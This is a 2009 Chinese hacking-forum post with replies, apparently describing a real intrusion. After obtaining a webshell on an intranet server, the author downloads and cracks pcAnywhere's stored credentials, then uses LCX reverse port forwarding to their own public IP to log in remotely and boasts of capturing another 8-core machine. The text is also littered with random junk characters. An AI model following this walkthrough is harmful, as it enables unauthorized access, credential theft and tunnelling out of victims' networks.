Board logo

标题: [原创文章] pcanywhere之内网提权 [打印本页]

作者: huar    时间: 2009-7-5 21:35     标题: pcanywhere之内网提权

很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。! O1 _  c3 \% J3 k" I* O2 V9 y

. U4 v/ {4 M+ u* C% z( W5 Z8 }提权方法:pcanywhere+LCX
# y, E/ h% v2 x, W, R. B! D
: V$ d5 b4 a: b0 w; j8 A获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
% {  T4 Q1 C4 I' R2 X
  H; O% ~  l# P. X在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
$ V) k, S) N& r* g+ e
" t, W4 D3 u# ?3 E7 p) O3 ]8 `[attach]1548[/attach]
. d$ T4 [  u* L' s4 O" v9 n查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
4 {' }$ p% M( T* t3 ]) D/ r3 W* y+ ]: r) t, c' E# b7 Y+ O1 A
[attach]1549[/attach]) B/ d2 g  A8 M- \# e$ w# s# |! J
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
4 B/ C/ L, e; g' r. \% A
. e1 X9 K4 s/ L+ a[attach]1550[/attach]8 J& \- D5 d2 \4 v  F" w

( r' B6 b* k1 x7 c. s[attach]1551[/attach]
+ p% W; H1 i9 Z6 p% g. C由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``8 x) D9 s, O/ I% K0 Q& a

' ?% r! ?8 E7 L7 H[attach]1552[/attach]
8 `' H, J% v1 f1 }0 Y& e6 TLCX的用法再简单说下:$ \0 [* p1 M  p. E: Y
- H* K) j8 Y# U1 w/ C0 _' A
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)6 H8 ?# D! O+ F' K  F/ Y/ I+ J( I

3 d+ Z8 H* z- F2 y, k本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)1 c: o9 b- g) k2 ~

2 y: `' m1 J' Y& c2 s由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
5 w  E% \7 |5 x) J7 K* l) {  S顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``  K. N% P0 H1 q; e1 Z7 O

- T' P0 `& q& J7 x1 Q7 r( Q' Q[attach]1553[/attach]
2 K& y! Q( W9 D. C  U4 w7 p$ ~9 D) o; _
[attach]1554[/attach]
9 Y+ E6 [  |  q5 t# c. e呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
( |  ^# m% Z; \0 j! n
8 V" F/ F6 {. ?& d, \- q# c, T1 G[attach]1555[/attach]0 H7 k7 `. z+ |& `0 k0 [0 y
6 }$ M' g! o7 t3 W9 ]
[attach]1556[/attach]
# a; O/ k& r+ T0 W9 [" \我们本地连接试试,输入我们刚破解的账号密码) N- m, V/ o4 V1 H, ], i& i. k* O4 B
) {& j/ l$ l! O8 o( r% D- L
[attach]1557[/attach]! I# D! D5 }/ I# m
呵呵``连接成功,服务器不错,又一个8核^︵^9 T8 b7 a* h- y# ?" ?5 N3 S
$ X" y& z/ ~2 [. w
[attach]1558[/attach]
! f4 P% d" {6 d7 Z
8 U/ q; h0 F; B4 {9 W0 W; T[attach]1559[/attach]
作者: 柔肠寸断    时间: 2009-7-5 21:37

不错不错。。。你的貌似一直都是内网服务器哈
作者: huar    时间: 2009-7-5 21:41

哎。。。。运气不佳```老碰见内网的。。。。
作者: gassiori    时间: 2009-7-6 09:50

八核的哟
作者: 柔肠寸断    时间: 2009-12-15 15:36

顶起。。。。。。。。。
作者: killadmin    时间: 2010-1-21 20:01

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2